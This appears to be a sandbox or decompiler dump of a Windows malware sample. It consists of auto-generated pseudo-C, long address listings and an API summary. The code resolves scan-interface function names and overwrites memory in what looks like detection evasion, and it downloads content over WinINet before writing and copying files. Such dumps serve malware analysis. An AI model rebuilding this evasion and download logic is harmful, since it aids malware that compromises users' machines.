                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v72, E02174D64(_v76));
                                                                                                					_push(_v72);
                                                                                                					_t3388 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v84, _t3388, 0x218e77c);
                                                                                                					E02174A98( &_v80, E02174D64(_v84));
                                                                                                					_pop(_t3554); // executed
                                                                                                					E02183690(_v80, _t3375, _t3554, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v88, E02174D64(_v92));
                                                                                                					_push(_v88);
                                                                                                					_t3389 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v100, _t3389, 0x218e77c);
                                                                                                					E02174A98( &_v96, E02174D64(_v100));
                                                                                                					_pop(_t3559); // executed
                                                                                                					E02183690(_v96, _t3375, _t3559, 0x2194b88); // executed
                                                                                                					E02174A98(0x2194b4c, E02174D64( *((intOrPtr*)(0x2190ab8 + E02183658(1, 3) * 4))));
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanString");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v104, E02174D64(_v108));
                                                                                                					_push(_v104);
                                                                                                					_t3390 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v116, _t3390, 0x218e77c);
                                                                                                					E02174A98( &_v112, E02174D64(_v116));
                                                                                                					_pop(_t3566); // executed
                                                                                                					E02183690(_v112, _t3375, _t3566, 0x2194b88); // executed
                                                                                                					_t3391 =  *0x2194b4c; // 0x3dfa858
                                                                                                					E02174BB0( &_v120, _t3391, "C:\\Windows\\System32\\");
                                                                                                					if(E021780F8(_v120) == 0) {
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanString");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v140, E02174D64(_v144));
                                                                                                						_push(_v140);
                                                                                                						_t3392 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v152, _t3392, 0x218e77c);
                                                                                                						E02174A98( &_v148, E02174D64(_v152));
                                                                                                						_pop(_t3572);
                                                                                                						E02183690(_v148, _t3375, _t3572, 0x2194b88);
                                                                                                						E021748F4(0x2194b34, "iexpress.exe");
                                                                                                					} else {
                                                                                                						_push(0x218e77c);
                                                                                                						_push( *0x2194bb0);
                                                                                                						_push("ScanString");
                                                                                                						E02174C24();
                                                                                                						E02174A98( &_v124, E02174D64(_v128));
                                                                                                						_push(_v124);
                                                                                                						_t3528 =  *0x2194bb0; // 0x3e01b38
                                                                                                						E02174BB0( &_v136, _t3528, 0x218e77c);
                                                                                                						E02174A98( &_v132, E02174D64(_v136));
                                                                                                						_pop(_t4328); // executed
                                                                                                						E02183690(_v132, _t3375, _t4328, 0x2194b88); // executed
                                                                                                						_t4329 =  *0x2194b4c; // 0x3dfa858
                                                                                                						E021748F4(0x2194b34, _t4329);
                                                                                                					}
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("OpenSession");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v156, E02174D64(_v160));
                                                                                                					_push(_v156);
                                                                                                					_t3393 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v168, _t3393, 0x218e77c);
                                                                                                					E02174A98( &_v164, E02174D64(_v168));
                                                                                                					_pop(_t3578); // executed
                                                                                                					E02183690(_v164, _t3375, _t3578, 0x2194b88); // executed
                                                                                                					_push(0x218e77c);
                                                                                                					_push( *0x2194bb0);
                                                                                                					_push("ScanBuffer");
                                                                                                					E02174C24();
                                                                                                					E02174A98( &_v172, E02174D64(_v176));
                                                                                                					_push(_v172);
                                                                                                					_t3394 =  *0x2194bb0; // 0x3e01b38
                                                                                                					E02174BB0( &_v184, _t3394, 0x218e77c);
                                                                                                					E02174A98( &_v180, E02174D64(_v184));
                                                                                                					_pop(_t3583); // executed
                                                                                                					E02183690(_v180, _t3375, _t3583, 0x2194b88); // executed
                                                                                                					E0217C510(0,  &_v188);
                                                                                                					E021748F4(0x21949d8, _v188);
                                                                                                					_t1320 =  *0x21949d8; // 0x3d3c508
                                                                                                					_v192 = _t1320;
                                                                                                					_t3376 = _v192;
                                                                                                					if(_t3376 != 0) {
                                                                                                						_t3376 =  *((intOrPtr*)(_t3376 - 4));
                                                                                                					}
                                                                                                				}
                                                                                                				goto L12;
                                                                                                			}
                                                                                                0x02189a8c
                                                                                                0x02189aa4
                                                                                                0x02189aaf
                                                                                                0x02189ab6
                                                                                                0x02189ac1
                                                                                                0x02189ad9
                                                                                                0x02189ae4
                                                                                                0x02189ae5
                                                                                                0x02189afa
                                                                                                0x02189b0a
                                                                                                0x02189b0f
                                                                                                0x02189b14
                                                                                                0x02189b26
                                                                                                0x02189b41
                                                                                                0x02189b46
                                                                                                0x02189b4b
                                                                                                0x02189b51
                                                                                                0x02189b57
                                                                                                0x02189b59
                                                                                                0x02189b5b
                                                                                                0x02189b5b
                                                                                                0x02189b5e
                                                                                                0x02189b5e
                                                                                                0x02189b67
                                                                                                0x02189b75
                                                                                                0x02189b7a
                                                                                                0x02189b89
                                                                                                0x02189b99
                                                                                                0x02189b9e
                                                                                                0x02189bab
                                                                                                0x02189bb1
                                                                                                0x02189bb6
                                                                                                0x02189bbb
                                                                                                0x02189bc1
                                                                                                0x02189bd1
                                                                                                0x02189be9
                                                                                                0x02189bf4
                                                                                                0x02189bfb
                                                                                                0x02189c06
                                                                                                0x02189c1e
                                                                                                0x02189c29
                                                                                                0x02189c2a
                                                                                                0x02189c39
                                                                                                0x02189c3e
                                                                                                0x02189c43
                                                                                                0x02189c49
                                                                                                0x02189c59
                                                                                                0x02189c71
                                                                                                0x02189c7c
                                                                                                0x02189c83
                                                                                                0x02189c8e
                                                                                                0x02189ca6
                                                                                                0x02189cb1
                                                                                                0x02189cb2
                                                                                                0x02189cbc
                                                                                                0x02189cc9
                                                                                                0x02189cce
                                                                                                0x02189cde
                                                                                                0x02189ce3
                                                                                                0x02189ce8
                                                                                                0x02189cee
                                                                                                0x02189cfe
                                                                                                0x02189d16
                                                                                                0x02189d21
                                                                                                0x02189d28
                                                                                                0x02189d33
                                                                                                0x02189d4b
                                                                                                0x02189d56
                                                                                                0x02189d57
                                                                                                0x02189d5c
                                                                                                0x02189d61
                                                                                                0x02189d67
                                                                                                0x02189d77
                                                                                                0x02189d8f
                                                                                                0x02189d9a
                                                                                                0x02189da1
                                                                                                0x02189dac
                                                                                                0x02189dc4
                                                                                                0x02189dcf
                                                                                                0x02189dd0
                                                                                                0x02189dda
                                                                                                0x02189de4
                                                                                                0x02189de6
                                                                                                0x02189df2
                                                                                                0x02189df7
                                                                                                0x02189e07
                                                                                                0x02189e17
                                                                                                0x02189e22
                                                                                                0x02189e2e
                                                                                                0x02189e39
                                                                                                0x02189e3a
                                                                                                0x02189e4a
                                                                                                0x02189e55
                                                                                                0x02189e61
                                                                                                0x02189e6c
                                                                                                0x02189e6d
                                                                                                0x02189e7d
                                                                                                0x02189e88
                                                                                                0x02189e94
                                                                                                0x02189e9f
                                                                                                0x02189ea0
                                                                                                0x02189eb0
                                                                                                0x02189ebb
                                                                                                0x02189ec7
                                                                                                0x02189ed2
                                                                                                0x02189ed3
                                                                                                0x02189ed8
                                                                                                0x02189edd
                                                                                                0x02189ee3
                                                                                                0x02189ef3
                                                                                                0x02189f0b
                                                                                                0x02189f16
                                                                                                0x02189f1d
                                                                                                0x02189f28
                                                                                                0x02189f40
                                                                                                0x02189f4b
                                                                                                0x02189f4c
                                                                                                0x02189f4c
                                                                                                0x02189f51
                                                                                                0x02189f56
                                                                                                0x02189f5c
                                                                                                0x02189f6c
                                                                                                0x02189f84
                                                                                                0x02189f8f
                                                                                                0x02189f96
                                                                                                0x02189fa1
                                                                                                0x02189fb9
                                                                                                0x02189fc4
                                                                                                0x02189fc5
                                                                                                0x02189fca
                                                                                                0x02189fcf
                                                                                                0x02189fd5
                                                                                                0x02189fe5
                                                                                                0x02189ffd
                                                                                                0x0218a008
                                                                                                0x0218a00f
                                                                                                0x0218a01a
                                                                                                0x0218a032
                                                                                                0x0218a03d
                                                                                                0x0218a03e
                                                                                                0x02189780
                                                                                                0x02189780
                                                                                                0x02189785
                                                                                                0x0218978b
                                                                                                0x0218979b
                                                                                                0x021897b3
                                                                                                0x021897be
                                                                                                0x021897c5
                                                                                                0x021897d0
                                                                                                0x021897e8
                                                                                                0x021897f3
                                                                                                0x021897f4
                                                                                                0x021897f9
                                                                                                0x021897fe
                                                                                                0x02189804
                                                                                                0x02189814
                                                                                                0x0218982c
                                                                                                0x02189837
                                                                                                0x0218983e
                                                                                                0x02189849
                                                                                                0x02189861
                                                                                                0x0218986c
                                                                                                0x0218986d
                                                                                                0x02189872
                                                                                                0x02189877
                                                                                                0x0218987d
                                                                                                0x0218988d
                                                                                                0x021898a5
                                                                                                0x021898b0
                                                                                                0x021898b7
                                                                                                0x021898c2
                                                                                                0x021898da
                                                                                                0x021898e5
                                                                                                0x021898e6
                                                                                                0x021898eb
                                                                                                0x021898f6
                                                                                                0x021898fb
                                                                                                0x02189900
                                                                                                0x02189912
                                                                                                0x0218992d
                                                                                                0x02189932
                                                                                                0x02189937
                                                                                                0x0218993d
                                                                                                0x02189945
                                                                                                0x02189947
                                                                                                0x02189947
                                                                                                0x0218994a
                                                                                                0x0218994a
                                                                                                0x02189953
                                                                                                0x02189966
                                                                                                0x02189975
                                                                                                0x02189975
                                                                                                0x0218a043
                                                                                                0x0218a048
                                                                                                0x0218a04e
                                                                                                0x0218a05e
                                                                                                0x0218a076
                                                                                                0x0218a081
                                                                                                0x0218a088
                                                                                                0x0218a093
                                                                                                0x0218a0ab
                                                                                                0x0218a0b6
                                                                                                0x0218a0b7
                                                                                                0x0218a0bc
                                                                                                0x0218a0c1
                                                                                                0x0218a0c7
                                                                                                0x0218a0d7
                                                                                                0x0218a0ef
                                                                                                0x0218a0fa
                                                                                                0x0218a101
                                                                                                0x0218a10c
                                                                                                0x0218a124
                                                                                                0x0218a12f
                                                                                                0x0218a130
                                                                                                0x0218a135
                                                                                                0x0218a13a
                                                                                                0x0218a140
                                                                                                0x0218a150
                                                                                                0x0218a168
                                                                                                0x0218a173
                                                                                                0x0218a17a
                                                                                                0x0218a185
                                                                                                0x0218a19d
                                                                                                0x0218a1a8
                                                                                                0x0218a1a9
                                                                                                0x0218a1b8
                                                                                                0x0218a1bd
                                                                                                0x0218a1c2
                                                                                                0x0218a1c8
                                                                                                0x0218a1d8
                                                                                                0x0218a1f0
                                                                                                0x0218a1fb
                                                                                                0x0218a202
                                                                                                0x0218a20d
                                                                                                0x0218a225
                                                                                                0x0218a230
                                                                                                0x0218a231
                                                                                                0x0218a236
                                                                                                0x0218a23b
                                                                                                0x0218a241
                                                                                                0x0218a251
                                                                                                0x0218a269
                                                                                                0x0218a274
                                                                                                0x0218a27b
                                                                                                0x0218a286
                                                                                                0x0218a29e
                                                                                                0x0218a2a9
                                                                                                0x0218a2aa
                                                                                                0x0218a2af
                                                                                                0x0218a2b4
                                                                                                0x0218a2bb
                                                                                                0x0218a2bd
                                                                                                0x0218e61c
                                                                                                0x0218e61c
                                                                                                0x0218e61e
                                                                                                0x0218e621
                                                                                                0x0218e624
                                                                                                0x0218e634
                                                                                                0x0218e644
                                                                                                0x0218e654
                                                                                                0x0218e664
                                                                                                0x0218e66f
                                                                                                0x0218ce3b
                                                                                                0x0218ce53
                                                                                                0x0218ce5e
                                                                                                0x0218ce5f
                                                                                                0x0218ce64
                                                                                                0x0218ce69
                                                                                                0x0218ce6f
                                                                                                0x0218ce7f
                                                                                                0x0218ce97
                                                                                                0x0218cea2
                                                                                                0x0218cea9
                                                                                                0x0218ceb4
                                                                                                0x0218cecc
                                                                                                0x0218ced7
                                                                                                0x0218ced8
                                                                                                0x0218cedd
                                                                                                0x0218cee7
                                                                                                0x0218ceec
                                                                                                0x0218cef2
                                                                                                0x0218cefc
                                                                                                0x0218cf01
                                                                                                0x0218cf07
                                                                                                0x0218cf11
                                                                                                0x0218cf16
                                                                                                0x0218cf1c
                                                                                                0x0218cf21
                                                                                                0x0218cf27
                                                                                                0x0218cf37
                                                                                                0x0218cf4f
                                                                                                0x0218cf5a
                                                                                                0x0218cf61
                                                                                                0x0218cf6c
                                                                                                0x0218cf84
                                                                                                0x0218cf8f
                                                                                                0x0218cf90
                                                                                                0x0218cf95
                                                                                                0x0218cf9a
                                                                                                0x0218cfa0
                                                                                                0x0218cfb0
                                                                                                0x0218cfc8
                                                                                                0x0218cfd3
                                                                                                0x0218cfda
                                                                                                0x0218cfe5
                                                                                                0x0218cffd
                                                                                                0x0218d008
                                                                                                0x0218d009
                                                                                                0x0218d016
                                                                                                0x0218d021
                                                                                                0x0218d032
                                                                                                0x0218d03c
                                                                                                0x0218d041
                                                                                                0x0218d046
                                                                                                0x0218d04c
                                                                                                0x0218d05c
                                                                                                0x0218d074
                                                                                                0x0218d07f
                                                                                                0x0218d086
                                                                                                0x0218d091
                                                                                                0x0218d0a9
                                                                                                0x0218d0b4
                                                                                                0x0218d0b5
                                                                                                0x0218d0ba
                                                                                                0x0218d0bf
                                                                                                0x0218d0c5
                                                                                                0x0218d0d5
                                                                                                0x0218d0ed
                                                                                                0x0218d0f8
                                                                                                0x0218d0ff
                                                                                                0x0218d10a
                                                                                                0x0218d122
                                                                                                0x0218d12d
                                                                                                0x0218d12e
                                                                                                0x0218d133
                                                                                                0x0218d145
                                                                                                0x0218d155
                                                                                                0x0218d15a
                                                                                                0x0218d15f
                                                                                                0x0218d165
                                                                                                0x0218d175
                                                                                                0x0218d18d
                                                                                                0x0218d198
                                                                                                0x0218d19f
                                                                                                0x0218d1aa
                                                                                                0x0218d1c2
                                                                                                0x0218d1cd
                                                                                                0x0218d1ce
                                                                                                0x0218d1d3
                                                                                                0x0218d1d8
                                                                                                0x0218d1de
                                                                                                0x0218d1ee
                                                                                                0x0218d206
                                                                                                0x0218d211
                                                                                                0x0218d218
                                                                                                0x0218d223
                                                                                                0x0218d23b
                                                                                                0x0218d246
                                                                                                0x0218d247
                                                                                                0x0218d24c
                                                                                                0x0218d25e
                                                                                                0x0218d263
                                                                                                0x0218d268
                                                                                                0x0218d26e
                                                                                                0x0218d27e
                                                                                                0x0218d296
                                                                                                0x0218d2a1
                                                                                                0x0218d2a8
                                                                                                0x0218d2b3
                                                                                                0x0218d2cb
                                                                                                0x0218d2d6
                                                                                                0x0218d2d7
                                                                                                0x0218d2dc
                                                                                                0x0218d2e1
                                                                                                0x0218d2e7
                                                                                                0x0218d2f7
                                                                                                0x0218d30f
                                                                                                0x0218d31a
                                                                                                0x0218d321
                                                                                                0x0218d32c
                                                                                                0x0218d344
                                                                                                0x0218d34f
                                                                                                0x0218d350
                                                                                                0x0218d355
                                                                                                0x0218d35b
                                                                                                0x0218d360
                                                                                                0x0218d365
                                                                                                0x0218d36b
                                                                                                0x0218d37b
                                                                                                0x0218d393
                                                                                                0x0218d39e
                                                                                                0x0218d3a5
                                                                                                0x0218d3b0
                                                                                                0x0218d3c8
                                                                                                0x0218d3d3
                                                                                                0x0218d3d4
                                                                                                0x0218d3d9
                                                                                                0x0218d3de
                                                                                                0x0218d3e4
                                                                                                0x0218d3f4
                                                                                                0x0218d40c
                                                                                                0x0218d417
                                                                                                0x0218d41e
                                                                                                0x0218d429
                                                                                                0x0218d441
                                                                                                0x0218d44c
                                                                                                0x0218d44d
                                                                                                0x0218d452
                                                                                                0x0218d457
                                                                                                0x0218d45d
                                                                                                0x0218d46d
                                                                                                0x0218d485
                                                                                                0x0218d490
                                                                                                0x0218d497
                                                                                                0x0218d4a2
                                                                                                0x0218d4ba
                                                                                                0x0218d4c5
                                                                                                0x0218d4c6
                                                                                                0x0218d4d0
                                                                                                0x0218d4d5
                                                                                                0x0218d4d6
                                                                                                0x0218d4db
                                                                                                0x0218d4dd
                                                                                                0x0218d4f0
                                                                                                0x0218d4f5
                                                                                                0x0218d4fb
                                                                                                0x0218d50b
                                                                                                0x0218d523
                                                                                                0x0218d52e
                                                                                                0x0218d535
                                                                                                0x0218d540
                                                                                                0x0218d558
                                                                                                0x0218d563
                                                                                                0x0218d564
                                                                                                0x0218d4df
                                                                                                0x0218d4e9
                                                                                                0x0218d4e9
                                                                                                0x0218d569
                                                                                                0x0218d56e
                                                                                                0x0218d574
                                                                                                0x0218d584
                                                                                                0x0218d59c
                                                                                                0x0218d5a7
                                                                                                0x0218d5ae
                                                                                                0x0218d5b9
                                                                                                0x0218d5d1
                                                                                                0x0218d5dc
                                                                                                0x0218d5dd
                                                                                                0x0218d5e7
                                                                                                0x0218d5f3
                                                                                                0x0218d5f8
                                                                                                0x0218d5fd
                                                                                                0x0218d602
                                                                                                0x0218d608
                                                                                                0x0218d618
                                                                                                0x0218d630
                                                                                                0x0218d63b
                                                                                                0x0218d642
                                                                                                0x0218d64d
                                                                                                0x0218d665
                                                                                                0x0218d670
                                                                                                0x0218d671
                                                                                                0x0218d676
                                                                                                0x0218d67b
                                                                                                0x0218d67c
                                                                                                0x0218d681
                                                                                                0x0218d686
                                                                                                0x0218d68c
                                                                                                0x0218d69c
                                                                                                0x0218d6b4
                                                                                                0x0218d6bf
                                                                                                0x0218d6c6
                                                                                                0x0218d6d1
                                                                                                0x0218d6e9
                                                                                                0x0218d6f4
                                                                                                0x0218d6f5
                                                                                                0x0218d6f5
                                                                                                0x0218cf16
                                                                                                0x0218cf01
                                                                                                0x0218d6fa
                                                                                                0x0218d6ff
                                                                                                0x0218d705
                                                                                                0x0218d715
                                                                                                0x0218d72d
                                                                                                0x0218d738
                                                                                                0x0218d73f
                                                                                                0x0218d74a
                                                                                                0x0218d762
                                                                                                0x0218d76d
                                                                                                0x0218d76e
                                                                                                0x0218d773
                                                                                                0x0218d778
                                                                                                0x0218d77e
                                                                                                0x0218d78e
                                                                                                0x0218d7a6
                                                                                                0x0218d7b1
                                                                                                0x0218d7b8
                                                                                                0x0218d7c3
                                                                                                0x0218d7db
                                                                                                0x0218d7e6
                                                                                                0x0218d7e7
                                                                                                0x0218d7ec
                                                                                                0x0218d7f6
                                                                                                0x0218d7fb
                                                                                                0x0218d801
                                                                                                0x0218d80b
                                                                                                0x0218d810
                                                                                                0x0218d816
                                                                                                0x0218d820
                                                                                                0x0218d825
                                                                                                0x0218d830
                                                                                                0x0218d835
                                                                                                0x0218d836
                                                                                                0x0218d83b
                                                                                                0x0218d83d
                                                                                                0x0218d850
                                                                                                0x0218d855
                                                                                                0x0218d85b
                                                                                                0x0218d86b
                                                                                                0x0218d883
                                                                                                0x0218d88e
                                                                                                0x0218d895
                                                                                                0x0218d8a0
                                                                                                0x0218d8b8
                                                                                                0x0218e5ac
                                                                                                0x0218e5b7
                                                                                                0x0218e5b8
                                                                                                0x0218e5ca
                                                                                                0x0218e5d5
                                                                                                0x0218e5d6
                                                                                                0x0218e5e6
                                                                                                0x0218e5f1
                                                                                                0x0218e5f2
                                                                                                0x0218e604
                                                                                                0x0218e60f
                                                                                                0x0218e610
                                                                                                0x0218e617
                                                                                                0x00000000
                                                                                                0x0218becd
                                                                                                0x0218becd
                                                                                                0x0218bed3
                                                                                                0x0218bed8
                                                                                                0x0218bee8
                                                                                                0x0218bf00
                                                                                                0x0218bf0b
                                                                                                0x0218bf10
                                                                                                0x0218bf12
                                                                                                0x00000000
                                                                                                0x0218bf18
                                                                                                0x0218bf23
                                                                                                0x0218bf2e
                                                                                                0x0218bf33
                                                                                                0x0218bf35
                                                                                                0x00000000
                                                                                                0x0218bf3b
                                                                                                0x0218bf3b
                                                                                                0x0218bf40
                                                                                                0x0218bf46
                                                                                                0x0218bf56
                                                                                                0x0218bf6e
                                                                                                0x0218bf79
                                                                                                0x0218bf80
                                                                                                0x0218bf8b
                                                                                                0x0218bfa3
                                                                                                0x0218bfae
                                                                                                0x0218bfaf
                                                                                                0x0218bfb4
                                                                                                0x0218bfb9
                                                                                                0x0218bfbf
                                                                                                0x0218bfcf
                                                                                                0x0218bfe7
                                                                                                0x0218bff2
                                                                                                0x0218bff9
                                                                                                0x0218c004
                                                                                                0x0218c01c
                                                                                                0x0218c027
                                                                                                0x0218c028
                                                                                                0x0218c039
                                                                                                0x0218c049
                                                                                                0x0218c051
                                                                                                0x0218c05d
                                                                                                0x0218c068
                                                                                                0x0218c06f
                                                                                                0x0218c08d
                                                                                                0x0218c0a5
                                                                                                0x0218c0b0
                                                                                                0x0218c0b7
                                                                                                0x0218c0ba
                                                                                                0x0218c0bc
                                                                                                0x0218c0bf
                                                                                                0x0218c0c2
                                                                                                0x0218c0c7
                                                                                                0x0218c0d1
                                                                                                0x0218c0d1
                                                                                                0x0218bf35
                                                                                                0x0218bf12
                                                                                                0x0218aa39
                                                                                                0x0218aa39
                                                                                                0x0218aa3f
                                                                                                0x0218aa4a
                                                                                                0x0218aa4f
                                                                                                0x0218aa54
                                                                                                0x0218aa5a
                                                                                                0x0218aa6a
                                                                                                0x0218aa82
                                                                                                0x0218aa94
                                                                                                0x00000000
                                                                                                0x0218aa9a
                                                                                                0x0218aa9a
                                                                                                0x0218aa9f
                                                                                                0x0218aaa5
                                                                                                0x0218aab5
                                                                                                0x0218aacd
                                                                                                0x0218aad8
                                                                                                0x0218aadf
                                                                                                0x0218aaea
                                                                                                0x0218ab02
                                                                                                0x0218ab0d
                                                                                                0x0218ab0e
                                                                                                0x0218ab13
                                                                                                0x0218ab18
                                                                                                0x0218ab1e
                                                                                                0x0218ab2e
                                                                                                0x0218ab46
                                                                                                0x0218ab51
                                                                                                0x0218ab58
                                                                                                0x0218ab63
                                                                                                0x0218ab7b
                                                                                                0x0218ab86
                                                                                                0x0218ab87
                                                                                                0x0218ab8c
                                                                                                0x0218ab91
                                                                                                0x0218ab97
                                                                                                0x0218aba7
                                                                                                0x0218abbf
                                                                                                0x0218abca
                                                                                                0x0218abd1
                                                                                                0x0218abdc
                                                                                                0x0218abf4
                                                                                                0x0218abff
                                                                                                0x0218ac00
                                                                                                0x0218ac05
                                                                                                0x0218ac0a
                                                                                                0x0218ac10
                                                                                                0x0218ac20
                                                                                                0x0218ac38
                                                                                                0x0218ac43
                                                                                                0x0218ac4a
                                                                                                0x0218ac55
                                                                                                0x0218ac6d
                                                                                                0x0218ac78
                                                                                                0x0218ac79
                                                                                                0x0218ac7e
                                                                                                0x0218ac84
                                                                                                0x0218ac89
                                                                                                0x0218ac9a
                                                                                                0x0218acb1
                                                                                                0x0218acb6
                                                                                                0x0218acbb
                                                                                                0x0218acc1
                                                                                                0x0218acd1
                                                                                                0x0218ace9
                                                                                                0x0218acf4
                                                                                                0x0218acfb
                                                                                                0x0218ad06
                                                                                                0x0218ad1e
                                                                                                0x0218ad29
                                                                                                0x0218ad2a
                                                                                                0x0218ad2f
                                                                                                0x0218ad34
                                                                                                0x0218ad3a
                                                                                                0x0218ad4a
                                                                                                0x0218ad62
                                                                                                0x0218ad6d
                                                                                                0x0218ad74
                                                                                                0x0218ad7f
                                                                                                0x0218ad97
                                                                                                0x0218ada2
                                                                                                0x0218ada3
                                                                                                0x0218ada8
                                                                                                0x0218adad
                                                                                                0x0218adb3
                                                                                                0x0218adc3
                                                                                                0x0218addb
                                                                                                0x0218ade6
                                                                                                0x0218aded
                                                                                                0x0218adf8
                                                                                                0x0218ae10
                                                                                                0x0218ae1b
                                                                                                0x0218ae1c
                                                                                                0x0218ae21
                                                                                                0x0218ae26
                                                                                                0x0218ae2c
                                                                                                0x0218ae3c
                                                                                                0x0218ae54
                                                                                                0x0218ae5f
                                                                                                0x0218ae66
                                                                                                0x0218ae71
                                                                                                0x0218ae89
                                                                                                0x0218ae94
                                                                                                0x0218ae95
                                                                                                0x0218ae9a
                                                                                                0x0218aea8
                                                                                                0x0218aeae
                                                                                                0x0218aeb3
                                                                                                0x0218aeb9
                                                                                                0x0218aec9
                                                                                                0x0218aee1
                                                                                                0x0218aeec
                                                                                                0x0218aef3
                                                                                                0x0218aefe
                                                                                                0x0218af16
                                                                                                0x0218af21
                                                                                                0x0218af22
                                                                                                0x0218af27
                                                                                                0x0218af2c
                                                                                                0x0218af32
                                                                                                0x0218af42
                                                                                                0x0218af5a
                                                                                                0x0218af65
                                                                                                0x0218af6c
                                                                                                0x0218af77
                                                                                                0x0218af8f
                                                                                                0x0218af9a
                                                                                                0x0218af9b
                                                                                                0x0218afa0
                                                                                                0x0218afa5
                                                                                                0x0218afab
                                                                                                0x0218afbb
                                                                                                0x0218afd3
                                                                                                0x0218afde
                                                                                                0x0218afe5
                                                                                                0x0218aff0
                                                                                                0x0218b008
                                                                                                0x0218b013
                                                                                                0x0218b014
                                                                                                0x0218b019
                                                                                                0x0218b02b
                                                                                                0x0218b036
                                                                                                0x0218b03b
                                                                                                0x0218b03b
                                                                                                0x0218b040
                                                                                                0x0218b045
                                                                                                0x0218b04b
                                                                                                0x0218b05b
                                                                                                0x0218b073
                                                                                                0x0218b07e
                                                                                                0x0218b085
                                                                                                0x0218b090
                                                                                                0x0218b0a8
                                                                                                0x0218b0b3
                                                                                                0x0218b0b4
                                                                                                0x0218b0b9
                                                                                                0x0218b0be
                                                                                                0x0218b0c4
                                                                                                0x0218b0d4
                                                                                                0x0218b0ec
                                                                                                0x0218b0f7
                                                                                                0x0218b0fe
                                                                                                0x0218b109
                                                                                                0x0218b121
                                                                                                0x0218b12c
                                                                                                0x0218b12d
                                                                                                0x0218b132
                                                                                                0x0218b137
                                                                                                0x0218b13d
                                                                                                0x0218b14d
                                                                                                0x0218b165
                                                                                                0x0218b170
                                                                                                0x0218b177
                                                                                                0x0218b182
                                                                                                0x0218b19a
                                                                                                0x0218b1a5
                                                                                                0x0218b1a6
                                                                                                0x0218b1ab
                                                                                                0x0218b1b0
                                                                                                0x0218b1b6
                                                                                                0x0218b1c6
                                                                                                0x0218b1de
                                                                                                0x0218b1e9
                                                                                                0x0218b1f0
                                                                                                0x0218b1fb
                                                                                                0x0218b213
                                                                                                0x0218b21e
                                                                                                0x0218b21f
                                                                                                0x0218b224

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218E742,?,?,?,00000000,00000000), ref: 0218915C
                                                                                                • InetIsOffline.URL(00000000,00000000,00000000,0218E742,?,?,?,00000000,00000000), ref: 02189181
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                  • Part of subcall function 021780F8: GetFileAttributesA.KERNEL32(00000000,?,02189493,ScanString,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178103
                                                                                                  • Part of subcall function 021734CC: GetFileSize.KERNEL32(0001D7B0,00000000,02194B88,?,02189B35,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4,ScanBuffer,0218E77C), ref: 021734E8
                                                                                                  • Part of subcall function 02188CBC: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02188D00
                                                                                                  • Part of subcall function 02188CBC: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02188D3B
                                                                                                  • Part of subcall function 02188CBC: InternetReadFile.WININET(00CC000C,021945B8,00000401,021949BC), ref: 02188D71
                                                                                                  • Part of subcall function 02188CBC: InternetCloseHandle.WININET(00CC000C), ref: 02188DB4
                                                                                                  • Part of subcall function 0217811C: GetFileAttributesA.KERNEL32(00000000,?,0218A7E7,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C,OpenSession), ref: 02178127
                                                                                                  • Part of subcall function 021782B0: CreateDirectoryA.KERNEL32(00000000,00000000,?,0218A80D,ScanString,0218E77C,OpenSession,0218E77C,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanString,0218E77C), ref: 021782BD
                                                                                                  • Part of subcall function 021889A4: _lcreat.KERNEL32(00000000,00000000), ref: 021889DB
                                                                                                  • Part of subcall function 021889A4: _lwrite.KERNEL32(00000000,00000000,?,00000000,02188A21), ref: 021889FB
                                                                                                  • Part of subcall function 021889A4: _lclose.KERNEL32(00000000), ref: 02188A01
                                                                                                  • Part of subcall function 02172FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,02194B88,?,02189AFF,ScanBuffer,0218E77C,OpenSession,0218E77C,Initialize,0218E77C,ScanBuffer,0218E77C,021949C4), ref: 02172FE8
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 0218B379
                                                                                                Memory Dump Source
